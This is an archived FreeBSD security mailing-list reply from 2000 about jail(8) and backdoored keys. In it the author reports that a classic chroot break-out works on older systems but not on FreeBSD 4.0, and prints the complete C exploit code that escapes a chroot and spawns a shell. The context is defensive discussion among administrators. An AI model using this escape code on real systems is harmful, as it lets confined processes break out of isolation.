From owner-freebsd-security  Fri May 12  6:22:50 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44])
	by hub.freebsd.org (Postfix) with ESMTP id D99BD37BB3D
	for <freebsd-security@FreeBSD.ORG>; Fri, 12 May 2000 06:22:46 -0700 (PDT)
	(envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost)
	by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA25489;
	Fri, 12 May 2000 06:20:00 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29)
 via SMTP by point.osg.gov.bc.ca, id smtpda25487; Fri May 12 06:19:59 2000
Received: (from uucp@localhost)
	by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA59363;
	Fri, 12 May 2000 06:19:58 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com"
 via SMTP by passer9.cwsent.com, id smtpdY59353; Fri May 12 06:19:41 2000
Received: (from uucp@localhost)
	by cwsys.cwsent.com (8.10.1/8.9.1) id e4CDJev40777;
	Fri, 12 May 2000 06:19:40 -0700 (PDT)
Message-Id: <200005121319.e4CDJev40777@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys"
 via SMTP by localhost.cwsent.com, id smtpdN40751; Fri May 12 06:19:06 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>
From: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>
X-OS: FreeBSD 4.0-STABLE
X-Sender: cy
To: Poul-Henning Kamp <phk@critter.freebsd.dk>
Cc: Paul Hart <hart@iserver.com>, Adam Laurie <adam@algroup.co.uk>,
	freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output 
In-reply-to: Your message of "Fri, 12 May 2000 10:00:11 +0200."
             <4226.958118411@critter.freebsd.dk> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 12 May 2000 06:19:06 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <4226.958118411@critter.freebsd.dk>, Poul-Henning Kamp 
writes:
> In message <Pine.BSF.4.21.0005110953510.8386-100000@anchovy.orem.iserver.com>
> , 
> Paul Hart writes:
> >On Thu, 11 May 2000, Adam Laurie wrote:
> >
> >> If someone backdoors your system with an authorized key, and is
> >> confident they can gain root from a luser account, they don't need to
> >> go any further, and it's extremely likely that the change will go
> >> unnoticed *forever*
> >
> >But if you have hostile local users with root access, can you even trust
> >the output from /etc/security?
> 
> Yes, if you put them in a jail(8).

I was about to comment that anyone with root can break out of any 
chrooted environment including jail, however testing the break out of 
jail exploit (good thing I tested before I spoke), which BTW worked on 
FreeBSD-3 and numerous other platforms including Linux, Solaris, and 
Tru64-UNIX, appears to no longer work under 4.0 -- which is a good 
thing!  When did the FreeBSD chroot(2) get fixed?

Once again FreeBSD leads the way.

Following is the break-out-of-jail code.

 #include <unistd.h>
 #include <assert.h>

 const char *shell = "/bin/sh";
 const char *lowerdir = "/tmp";

 int main() {
        int i;

        assert(chdir("/") != -1);
        assert(chroot(lowerdir) != -1);
        for (i = 0; i < 32; i++)
                assert(chdir("..") != -1);
        assert(chroot(".") != -1);

        assert(execl(shell, shell, NULL) != -1);
 };


Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC





To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message